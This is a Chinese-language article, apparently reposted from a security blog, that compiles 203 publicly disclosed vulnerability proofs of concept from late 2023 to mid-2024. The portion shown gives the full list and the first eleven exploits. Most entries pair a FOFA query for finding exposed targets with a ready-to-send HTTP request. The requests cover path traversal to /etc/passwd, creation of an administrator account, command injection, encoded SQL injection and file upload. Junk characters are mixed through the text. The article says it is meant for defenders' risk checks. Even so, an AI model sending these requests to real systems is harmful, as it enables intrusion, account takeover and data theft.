互联网公开漏洞整理202309-202406/ w' b% u0 e/ ^/ L+ h6 M
道一安全 2024-06-05 07:41 北京) o- h% q8 v9 P% @9 N7 s) c
以下文章来源于网络安全新视界 ,作者网络安全新视界
" f0 N/ }. D" u5 [; M) i
2 X T1 Y- l! V3 U' m发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。" S9 {. ?% D* D" O$ F
0 |0 k% L6 T0 I! [6 X9 ]# h9 a0 V
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
, F# J3 |7 ]! m6 W
; ]/ T/ |# r* d安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
) p0 s9 p+ `# \ i; z# Z$ I2 B
5 E- N T( s; Q$ u" Z' G: I文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
4 F- w% q5 c3 j5 x/ z' u7 X3 _8 f# S) }3 i% M
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。3 p0 N9 C. }4 e3 v9 D
! I: c# y1 b0 J: Y( y% |3 L
. a! D- S# Q" b3 V- p+ C, Y& u( K声明
. P- |- |. `5 }: \6 H3 x& V
5 k4 K; V1 u; S: p为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。1 r2 J: i# d2 h' l% ?- ~
1 d' E* b3 E, [/ u% h3 P有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
6 i' e( g4 q# y! \4 a- v4 d7 O; i) F+ v6 n* T
6 N6 P9 H/ ]5 L( u' m9 W
9 A; ~! f7 h- E! c, L: v目录
/ Z+ `% I2 O" X- k
: y) y1 d/ K) o6 f- k( K& e017 d* O4 l! M% O& t7 n
, ?" f; U( ^% `7 V1. StarRocks MPP数据库未授权访问8 O) b4 F2 \, u' t/ L
2. Casdoor系统static任意文件读取
) R9 g2 {; S# u# i4 q3. EasyCVR智能边缘网关 userlist 信息泄漏& p3 S6 Y$ U& v' v) {9 p
4. EasyCVR视频管理平台存在任意用户添加
' c1 y: \0 w& m' T, c4 y5. NUUO NVR 视频存储管理设备远程命令执行1 z c3 {/ |; `3 v# y
6. 深信服 NGAF 任意文件读取; ]7 Z! }* x4 v* \4 |: v$ o: e
7. 鸿运主动安全监控云平台任意文件下载. a. `1 `2 F9 o
8. 斐讯 Phicomm 路由器RCE. G4 z& n0 U( I
9. 稻壳CMS keyword 未授权SQL注入
# U) R# |7 L+ g$ H10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ n* l0 U. h" L7 {1 N
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 t; @. i" ?- {0 |) _
12. Jorani < 1.0.2 远程命令执行
# `" {% G% w3 F$ r3 f4 T13. 红帆iOffice ioFileDown任意文件读取+ h$ C5 r+ a* y7 O+ H
14. 华夏ERP(jshERP)敏感信息泄露8 B/ e) F# Q! Q( t
15. 华夏ERP getAllList信息泄露
4 p% j( t& F* w# m- {16. 红帆HFOffice医微云SQL注入
1 P- J: Z& C/ s5 r6 u4 k3 ~" J" J* I17. 大华 DSS itcBulletin SQL 注入
y9 C0 n B6 Q3 l18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
3 g4 A- t+ B6 ~6 y! c! y8 p19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入+ I* q$ A3 L: p
20. 大华ICC智能物联综合管理平台任意文件读取
) ]$ j8 Y! l2 U5 h21. 大华ICC智能物联综合管理平台random远程代码执行
/ `' [3 w$ u+ p; T5 Q8 m% L22. 大华ICC智能物联综合管理平台 log4j远程代码执行
: \. m! }5 {& W& t9 d5 Z% D8 _23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
7 a( @* p4 @7 P6 R24. 用友NC 6.5 accept.jsp任意文件上传6 O6 \# f) X) f. C
25. 用友NC registerServlet JNDI 远程代码执行2 g) h) S. @! J" m% P' A
26. 用友NC linkVoucher SQL注入1 c- ?8 v- U/ r
27. 用友 NC showcontent SQL注入, b J% _# \- K' w
28. 用友NC grouptemplet 任意文件上传+ n% ]: u; @ x' P
29. 用友NC down/bill SQL注入
l- `/ V# ^/ H6 Y Q30. 用友NC importPml SQL注入* p; k) Z* q. b' q$ a) S
31. 用友NC runStateServlet SQL注入
" | t9 ~" K( H7 ^4 s+ n32. 用友NC complainbilldetail SQL注入
' Z9 W- K- U" Y; l33. 用友NC downTax/download SQL注入
' f( r- s: E- R* U8 {34. 用友NC warningDetailInfo接口SQL注入
4 f" n9 s4 ~- K( ~35. 用友NC-Cloud importhttpscer任意文件上传* N$ ^ U/ {5 {6 W2 x4 j
36. 用友NC-Cloud soapFormat XXE" y8 K4 _ E% E ?2 L1 [; S
37. 用友NC-Cloud IUpdateService XXE" m7 k# `' D0 n
38. 用友U8 Cloud smartweb2.RPC.d XXE
! t; m. K4 ]* i" S F39. 用友U8 Cloud RegisterServlet SQL注入
1 F7 Y! c* |2 q: U0 \40. 用友U8-Cloud XChangeServlet XXE5 I- R: {# }* {% i
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
8 B( ~- I" |: F/ j |* E3 a) ^( I) O, U. \42. 用友GRP-U8 SmartUpload01 文件上传+ y2 d, m9 m# R+ u$ ^0 l9 }
43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ r: g, X5 [. ]3 J
44. 用友GRP-U8 bx_dj_check.jsp SQL注入% x1 ?' X; o2 `7 f1 L
45. 用友GRP-U8 ufgovbank XXE
' K: P' @" V1 t3 ^46. 用友GRP-U8 sqcxIndex.jsp SQL注入
, \+ y, c$ T' n3 J9 d P; x6 ?47. 用友GRP A++Cloud 政府财务云 任意文件读取
( v7 n. r9 s j6 [+ A! q8 r48. 用友U8 CRM swfupload 任意文件上传# a# c' q" n6 _& C! c' t
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
& t5 I" Z! d8 {' g5 Q l50. QDocs Smart School 6.4.1 filterRecords SQL注入- F8 J& }" I P1 ^2 ]
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 w' f& I: ?, [- a8 s# `) v) X
52. 泛微E-Office json_common.php sql注入8 O: E. s& b2 y9 l$ X5 @
53. 迪普 DPTech VPN Service 任意文件上传
' p# |& F4 ^# {* {54. 畅捷通T+ getstorewarehousebystore 远程代码执行
: w) L+ P0 {! g+ [/ g5 v4 r6 {" |55. 畅捷通T+ getdecallusers信息泄露) n2 ?7 j9 q* M0 [
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE7 P& M5 X J: `' a
57. 畅捷通T+ keyEdit.aspx SQL注入
7 e8 K6 A3 `' _8 W8 b( R5 b$ T# J8 C58. 畅捷通T+ KeyInfoList.aspx sql注入* t( g' |5 ~: m! P
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
; _' @4 a) V% W9 Q0 r k60. 百卓Smart管理平台 importexport.php SQL注入
# k1 `& F+ }0 A( A! t61. 浙大恩特客户资源管理系统 fileupload 任意文件上传2 I' |' |& d) ~
62. IP-guard WebServer 远程命令执行: b' Q' h) C% u, p
63. IP-guard WebServer任意文件读取& \# ]# Q8 a K" R8 E/ A
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
1 K1 Q0 v% ?) D5 y |+ N4 w65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
9 `0 N; [9 y# w+ k+ d66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. b) b$ ]6 j( F$ H; {
67. 万户ezOFFICE wpsservlet任意文件上传: X8 r) e8 H; p8 q
68. 万户ezOFFICE wf_printnum.jsp SQL注入
7 U7 O$ R( `3 e69. 万户 ezOFFICE contract_gd.jsp SQL注入. K- b+ E$ n; X8 x$ l% f; e
70. 万户ezEIP success 命令执行
4 J0 X, E! f" v1 a) D( {/ B6 f71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
7 B/ `" A' r$ A G9 H( e- _72. 致远OA getAjaxDataServlet XXE2 S% @. H z% d7 {/ D8 `
73. GeoServer wms远程代码执行0 Y, l( _) k! s% y; ]1 K: @
74. 致远M3-server 6_1sp1 反序列化RCE
& [' {0 w" n& E/ O: B. i75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE5 n3 e9 p& Z; H: c
76. 新开普掌上校园服务管理平台service.action远程命令执行
! B2 {* n& y/ g5 _' U77. F22服装管理软件系统UploadHandler.ashx任意文件上传' T/ N2 S) h" N& g* ^& Z; {
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
9 w e6 x( x% T$ e% L; h# G7 c- ~! O79. BYTEVALUE 百为流控路由器远程命令执行7 T* Y% f2 Z5 [5 f
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
( V3 \- f: [9 Z" @$ q81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- b( K( e# {# x% u82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
- S1 x1 b0 X# _* Y2 Z8 s p83. JeecgBoot testConnection 远程命令执行: X8 c) {' G- h5 F+ C6 G1 {- p
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' d- D5 z: ]: g/ V- q. R" J% m85. SysAid On-premise< 23.3.36远程代码执行
4 ~. F) S3 q3 Y! v, s0 A86. 日本tosei自助洗衣机RCE7 K& Y$ x* ^) k @
87. 安恒明御安全网关aaa_local_web_preview文件上传
# B2 l2 F! O) w88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行/ h5 V4 }, b0 n$ L; [
89. 致远互联FE协作办公平台editflow_manager存在sql注入6 J* M6 I" S) m6 o; @
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
) e* w7 Y5 a- J91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" _6 U' p+ p! b) N92. 海康威视运行管理中心session命令执行9 I# w4 ~, L( W/ D
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 C1 k: m( a1 q: w
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传0 u3 o6 k- a$ `1 y& }% ]" `0 q, N
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行7 l+ c$ x1 o: m% `3 p2 f$ ?. R9 L4 e
96. Apache OFBiz 18.12.11 groovy 远程代码执行
1 X! U# i6 c6 A; K97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行9 ?9 A8 c7 r- B" n3 @/ K
98. SpiderFlow爬虫平台远程命令执行
9 A0 k( ~% p, n$ Z' d99. Ncast盈可视高清智能录播系统busiFacade RCE
9 M6 D! e' T& t+ [100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
+ _ E, {8 F- H& V101. ivanti policy secure-22.6命令注入
" e+ y% i, i0 \) e! g. w/ N4 W- e# t102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行- Z2 {6 y) v' w' N! }0 N; l
103. Ivanti Pulse Connect Secure VPN XXE, m; c0 t5 B& A0 ]
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露/ S. B I: y7 n6 C4 O' `9 k2 G) X2 [
105. SpringBlade v3.2.0 export-user SQL 注入3 N6 G( m- F5 y) S0 L9 v" {$ }9 z
106. SpringBlade dict-biz/list SQL 注入
1 C' `5 ]3 A# \4 z5 q107. SpringBlade tenant/list SQL 注入
7 c* F- p$ {' Y% p108. D-Tale 3.9.0 SSRF/ Z) S& m& S, D- G! ]+ k9 I+ z3 l0 Q
109. Jenkins CLI 任意文件读取
( F8 K/ ?2 G/ F! q9 @& z110. Goanywhere MFT 未授权创建管理员
! G. Y9 ]+ a. ^6 z% ?111. WordPress Plugin HTML5 Video Player SQL注入
/ z: T o8 W) t) V" V- P, G* }5 M112. WordPress Plugin NotificationX SQL 注入
, y4 R1 n8 Q6 P8 `113. WordPress Automatic 插件任意文件下载和SSRF0 M; k& g1 t" A9 c6 b6 Q
114. WordPress MasterStudy LMS插件 SQL注入
/ r& i+ }' U! A115. WordPress Bricks Builder <= 1.9.6 RCE0 Z7 Q' w& J! \4 M$ W/ e2 D/ a$ h
116. wordpress js-support-ticket文件上传
. D% G# H7 W; }, e4 T! p117. WordPress LayerSlider插件SQL注入) j7 U/ z9 m& \
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
1 n3 X; m* k" ^1 N0 N/ \) F0 ?119. 北京百绰智能S20后台sysmanageajax.php sql注入" X. j$ I; {% F3 ?* o6 a
120. 北京百绰智能S40管理平台导入web.php任意文件上传* l5 ?7 s0 l, V- r" L" l9 S2 M
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
1 u6 V9 C- X) D# t) N122. 北京百绰智能s200管理平台/importexport.php sql注入
2 F3 f; v0 K) ]: U( V; d" m8 M123. Atlassian Confluence 模板注入代码执行
: F. Q& S" J, B. |9 r. Z1 f+ G124. 湖南建研工程质量检测系统任意文件上传. P$ j5 ?# r. r! ]/ b2 ?! f) Z$ f
125. ConnectWise ScreenConnect身份验证绕过
( z/ q3 x/ u' G( E4 @7 B& x126. Aiohttp 路径遍历' f% K- N$ z, I
127. 广联达Linkworks DataExchange.ashx XXE
3 l. z2 {. m& w; U. c1 W* r128. Adobe ColdFusion 反序列化
; S4 R& X" l3 W v: Y129. Adobe ColdFusion 任意文件读取
, @% w( o2 p- O, k, g6 f; Z8 Y) q130. Laykefu客服系统任意文件上传* c( s+ c1 G1 u8 J5 M. Z3 w
131. Mini-Tmall <=20231017 SQL注入
, A* J# q; {" d% t; p! x132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
) z+ K8 N5 A6 X, P' v133. H5 云商城 file.php 文件上传
{$ o: R+ B/ u1 d4 v134. 网康NS-ASG应用安全网关index.php sql注入- }; {/ m! l q) L- j+ f7 u c
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* j% k) v$ Q' G# d: o( w. p4 M
136. NextChat cors SSRF1 U0 U) D [ D! X! C
137. 福建科立迅通信指挥调度平台down_file.php sql注入8 [+ z. P6 X: C. ?: a5 _+ X
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 ]$ E4 s2 n) N- f5 H
139. 福建科立讯通信指挥调度平台editemedia.php sql注入0 R' Z& c1 Y5 U9 o& { s4 A
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入9 ?( a$ l1 O; b6 m/ y$ h
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入, }2 r1 v6 k$ x
142. CMSV6车辆监控平台系统中存在弱密码
4 O2 b: y7 }( J: m E; n" |143. Netis WF2780 v2.1.40144 远程命令执行+ o4 t0 o' _6 }' O! a, H) y
144. D-Link nas_sharing.cgi 命令注入, @$ x9 o6 [6 c2 R# G" Q- n
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
! Y2 L0 T+ K- k3 {2 l( d+ E146. MajorDoMo thumb.php 未授权远程代码执行1 ?4 _2 b2 \5 V. W7 J% O
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历5 w# L, g( A _4 ?$ v N
148. CrushFTP 认证绕过模板注入
& e( |% B# {; ^2 A" Z' C7 n" q2 @149. AJ-Report开源数据大屏存在远程命令执行
. o' }* t5 p6 H% T: f150. AJ-Report 1.4.0 认证绕过与远程代码执行
! @5 y3 ?4 O! @" L5 r151. AJ-Report 1.4.1 pageList sql注入: G+ q! P/ o$ q& Z6 g
152. Progress Kemp LoadMaster 远程命令执行. j& [5 N0 |0 d) m; U% ^
153. gradio任意文件读取
: f# j. b' q: B @4 `154. 天维尔消防救援作战调度平台 SQL注入
; b9 d8 T+ h% k9 H155. 六零导航页 file.php 任意文件上传
( _) F$ a# \* c, n6 G9 u/ w, {156. TBK DVR-4104/DVR-4216 操作系统命令注入
0 V. M5 m5 \3 ]1 B, s: i157. 美特CRM upload.jsp 任意文件上传
9 c" O0 D9 u+ {6 e- K0 r0 {158. Mura-CMS-processAsyncObject存在SQL注入/ t( O9 l& q) q0 O* O! X4 t
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
: a: M! H/ ]: ~9 T; L160. Sonatype Nexus Repository 3目录遍历与文件读取
) f9 g+ b& q% e161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传& G* f F% A0 K8 F6 `
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
/ }6 O. h5 ~$ q! F. d163. 号卡极团分销管理系统 ue_serve.php 任意文件上传0 D& @1 T( {8 T& s0 v, [
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传 \9 b( @2 b0 |/ N9 ~% s
165. OrangeHRM 3.3.3 SQL 注入
G7 q2 n% ?" M5 `2 p166. 中成科信票务管理平台SeatMapHandler SQL注入8 A# r/ L4 ]# D8 S* i% }; }
167. 精益价值管理系统 DownLoad.aspx任意文件读取. K0 Y C' q9 {6 S8 ]
168. 宏景EHR OutputCode 任意文件读取- v7 A9 j9 ?& i) c( x" X- B
169. 宏景EHR downlawbase SQL注入3 i3 f+ w2 S( y3 p6 T' L( x
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 Y. k" O* L/ l; ~! z- l+ R5 R$ M171. 通天星CMSV6车载定位监控平台 SQL注入/ h" G% d$ H+ e4 v# q( X" l# h: A
172. DT-高清车牌识别摄像机任意文件读取
1 C6 h8 l( M. ? P173. Check Point 安全网关任意文件读取
8 \4 g& `" f" e5 b174. 金和OA C6 FileDownLoad.aspx 任意文件读取9 f$ L/ [) j) `+ R4 P
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入: |0 W7 N: D) p: G% V5 W
176. 电信网关配置管理系统 rewrite.php 文件上传
- j+ e* |& k5 k7 N( W+ U177. H3C路由器敏感信息泄露9 n% t1 W( {; l# R
178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ T: w$ n5 s4 T( d5 r' v
179. 建文工程管理系统存在任意文件读取8 b+ ]+ y' f6 k# l
180. 帮管客 CRM jiliyu SQL注入
5 g- ^3 z+ h: T181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入) ?; Q7 s |5 ?# r% M9 t
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建2 c) ]/ G5 N* D4 {; Q
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入; U/ P) \) U2 ]& \* s
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' R5 t' E/ G6 P' b185. 瑞友天翼应用虚拟化系统SQL注入* t6 W7 _. d6 @& M. b7 A
186. F-logic DataCube3 SQL注入* Y8 p; y* j! x1 k" @! v
187. Mura CMS processAsyncObject SQL注入
5 `; d: e( k; U6 j9 x5 s! x' ]* \188. 叁体-佳会视频会议 attachment 任意文件读取/ S, _: {* L+ C6 q" v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入) T8 o T' G: s9 O, M
190. 短视频矩阵营销系统 poihuoqu 任意文件读取) _8 E' C5 K L) A1 i
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
& s( E; l5 G. p1 W2 {7 ~% Q192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
' O' Y) o. @. E) ~2 S2 t0 Q193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行% N; v6 Y3 J' o8 v9 v
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
9 b7 I0 _5 L$ |1 z" z2 u$ }195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" @% Q: u; @! x- L2 P. w# P, t
196. 河南省风速科技统一认证平台密码重置
; L9 b. t3 j' J7 [6 l( ~197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入& t" ]# N3 i. o. ?
198. 阿里云盘 WebDAV 命令注入" _ f8 f" e1 ^* r
199. cockpit系统assetsmanager_upload接口 文件上传
# y" ]0 s2 }; Z- K# _4 g* Z200. SeaCMS海洋影视管理系统dmku SQL注入
# S0 X& N8 H' R201. 方正全媒体新闻采编系统 binary SQL注入
" `8 H: k& ?3 Z9 W/ K7 q% K6 X; v202. 微擎系统 AccountEdit任意文件上传' w) J; {8 l6 {' f* M# m# ~8 p
203. 红海云EHR PtFjk 文件上传; s4 Y- ^3 e4 Z% S+ _4 J
( \3 \6 F( g$ h/ I3 g
POC列表( u1 Y$ X. d W7 q. j
( W% \1 q; B' {: l( s, ]
023 \: g' O, v1 e: K. r$ F7 s
* A0 }, m8 R s3 n# ?4 U1. StarRocks MPP数据库未授权访问
6 ?; p' `8 \6 a, ZFOFA :title="StarRocks"; e. B" e$ R( R
GET /mem_tracker HTTP/1.1
5 r2 _( B4 s# ^. u! s/ LHost: URL# _# g$ ~/ Z: L; n8 s
- `5 i2 g* ~/ u- v
* T/ [4 t3 C j+ [$ k: E% ^2. Casdoor系统static任意文件读取
$ B4 G* S- d3 I7 N8 NFOFA :title="Casdoor"7 _( D8 x6 f" F4 M
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1! R7 [! g' d4 {5 S9 D5 ?+ W- c
Host: xx.xx.xx.xx:9999
2 z1 m% w5 @3 d0 f* o7 nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 N+ u& t! D! k2 cConnection: close
* e$ V% M: x5 ?' N( G! G8 I c# N2 i% kAccept: */*& D# D0 A6 u3 P" A4 R+ Q
Accept-Language: en
- A f+ Y! m: i! @Accept-Encoding: gzip1 a+ E. H$ ^/ O) }( J. e
2 B9 C! \* ~2 H/ @# {
( z6 p) w0 M6 s' `
3. EasyCVR智能边缘网关 userlist 信息泄漏2 G! @$ x# m: ?) o9 m; o6 |. M$ ~: d
FOFA :title="EasyCVR"5 h( f& k( A3 N# K
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1) f3 l1 T/ `2 |* B4 v
Host: xx.xx.xx.xx
+ o% `$ t% W. @1 f$ }; N8 U3 V, j3 ^0 x. X8 t- C; X8 ]. v O
, z, s: ]2 i0 V' k4. EasyCVR视频管理平台存在任意用户添加
7 D* V3 P k F1 N7 k i# Z6 T1 \FOFA :title="EasyCVR"6 g: v M( g M: p( _/ J/ d
% n1 F) N+ [6 t; F- s! S1 a/ bpassword更改为自己的密码md5
8 O: T0 f: l$ XPOST /api/v1/adduser HTTP/1.1( X2 K' e. Y4 x) i, d9 O
Host: your-ip
) l3 b M, I: D2 G* _( vContent-Type: application/x-www-form-urlencoded; charset=UTF-8- {( ]1 r# N) M; {: }
7 y# W. \( r0 z: P8 v
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=19 @& N$ b+ ~6 ]; ^
# t" d$ b8 K3 R$ _* z' B
, S) s7 L, N' R
5. NUUO NVR 视频存储管理设备远程命令执行
. }5 k6 r8 z) Y. U# _, x( i: CFOFA:title="Network Video Recorder Login"
& g: f+ B" s+ z) J$ }GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
# I: u6 c. s1 U( y- KHost: xx.xx.xx.xx0 T& B4 z* k; ]& {) Z
: @# \# U2 T0 a- n, J, b
/ N) l, R# F7 k6 N6. 深信服 NGAF 任意文件读取: h8 o% b# _6 i0 X, |% U
FOFA:title="SANGFOR | NGAF"
4 c4 K& a4 o$ |GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1: S, e+ l+ j/ c# ?4 M+ j! }0 s7 `
Host:2 [, G- ^4 \- X6 }
: ^, X' F6 Q% k6 V! @2 w: u) y
/ x' v% c2 i: e% f5 W. }+ ^' s9 T3 M7. 鸿运主动安全监控云平台任意文件下载
: f+ o$ Z# B; o5 V8 @' y! TFOFA:body="./open/webApi.html": F( S1 R8 j. k# N0 N% D# k; w
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
1 K9 ^! k, m/ m- MHost:1 \+ Z! _( Q6 t1 }2 h0 \- L0 k
$ f' o" T/ u' H
; @ @4 F: n: {/ Z: s2 {: i& C8. 斐讯 Phicomm 路由器RCE
8 V) Z3 T r! g4 C7 OFOFA:icon_hash="-1344736688"
. k% k% r; s# Y6 a默认账号admin登录后台后,执行操作1 |0 U, J5 X2 b0 z: @
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
$ m# q- \! w. a/ ^8 t, |( X2 ]' bHost: x.x.x.x1 X) Z9 e6 D& N$ Q
Cookie: sysauth=第一步登录获取的cookie
, k! k1 \# ^. Y6 b% w5 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
D, ^* E% p9 L5 W) aUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
. e) y4 h4 u$ b j5 k5 _
! e0 w) N( s. i U------WebKitFormBoundaryxbgjoytz4 f9 j8 N' X. P& m$ z
Content-Disposition: form-data; name="wifiRebootEnablestatus"
- I/ j8 m' X, O+ o7 M
, U5 G! h$ f) U9 P- K%s
4 G/ _% t5 y2 `& s------WebKitFormBoundaryxbgjoytz
, [7 U7 T1 {$ [, J3 {% v T' [4 h) j! vContent-Disposition: form-data; name="wifiRebootrange"7 v" S5 }$ X8 |* ?
& x5 K @6 `& n6 |2 q12:00; id;; W# b& i8 D9 v
------WebKitFormBoundaryxbgjoytz! {9 X9 L& r& ^+ g' I* V
Content-Disposition: form-data; name="wifiRebootendrange"; c/ B3 M" Z: F) q3 i; [
* F* w* w' m( O% V# _: \%s:: X/ P- j* @6 Q% K6 I
------WebKitFormBoundaryxbgjoytz& ]- r1 s2 F$ }6 S
Content-Disposition: form-data; name="cururl2"8 f+ p& ]& y. `7 v6 R" R8 { l9 D
P6 B* h" c5 a8 p- Y) w
0 n8 H1 K& c2 v& k# Z4 i) W: z3 q------WebKitFormBoundaryxbgjoytz--
( V1 h1 b: F% g% k2 g$ `, S e" D
) e2 e% K; H6 h0 ]& t e! h9. 稻壳CMS keyword 未授权SQL注入
0 |2 v! I% a( b( BFOFA:app="Doccms"
8 ?; x2 s" I# ]% {7 ^. |GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1( A) K+ f" z7 E+ j# `# o) p
Host: x.x.x.x$ {0 F$ j: h, o
- _) P6 F! }% T( u: d* z5 J
. s) o/ C$ Q& J% H0 Xpayload为下列语句的二次Url编码
8 y8 n- _6 v; M6 V, Z
4 U u: n# J7 |1 h' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#7 K; J% I( b+ D3 H
4 h7 a9 m' R" Q- J& ~" i10. 蓝凌EIS智慧协同平台api.aspx任意文件上传1 K; s) X9 L3 D e- S
FOFA:icon_hash="953405444"
/ {1 Y* I: ]- t
( ]- S0 d0 I1 G% o文件上传后响应中包含上传文件的路径
! o1 x8 O- U9 T& sPOST /eis/service/api.aspx?action=saveImg HTTP/1.1/ A) v9 Q8 d# E: j7 [
Host: x.x.x.x:xx
# V+ ~0 @9 _* S, g% aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
w( ]4 }7 V( B8 K/ z* NContent-Length: 197
. ?9 a3 f* E M5 \' ]' J# B: u% cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# ~5 G, v) _4 K; b0 o# ^7 O& y
Accept-Encoding: gzip, deflate
8 f7 [, e0 i: @2 tAccept-Language: zh-CN,zh;q=0.9
5 h, q. K# R9 |1 D7 j5 mConnection: close
& G- H+ {& o5 d( rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 P* ]- t* ~* A8 W% [, l& D" O" Y+ j
' k# m' |; ^5 v0 ^$ j0 m' M# g------WebKitFormBoundaryxdgaqmqu; e) ^7 Q3 A a; J4 p C& Q! O
Content-Disposition: form-data; name="file"filename="icfitnya.txt"' T) L" Q! O0 K* s) Q
Content-Type: text/html
% f! m! d C$ v: O
4 a9 C @2 A" Z5 }- ~( `jmnqjfdsupxgfidopeixbgsxbf T5 x9 B1 J7 y$ Q/ }; w( c
------WebKitFormBoundaryxdgaqmqu--
& l. y# x# S m0 ?
4 m* F$ N! Q2 j" @+ j; w) C& B( v4 H" T6 Q& {! Y3 Y/ y/ T
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入7 Y- E! U5 _/ P+ Q P6 ?
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台" Q% o: n; F% p2 C0 b- ^; F
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
5 n8 F5 o9 ?/ {; i& F: j6 B, Z9 f# z, GHost: 127.0.0.1* i; w3 d5 f7 R
Pragma: no-cache3 ~. |: P) W( t8 M U% a3 h$ O
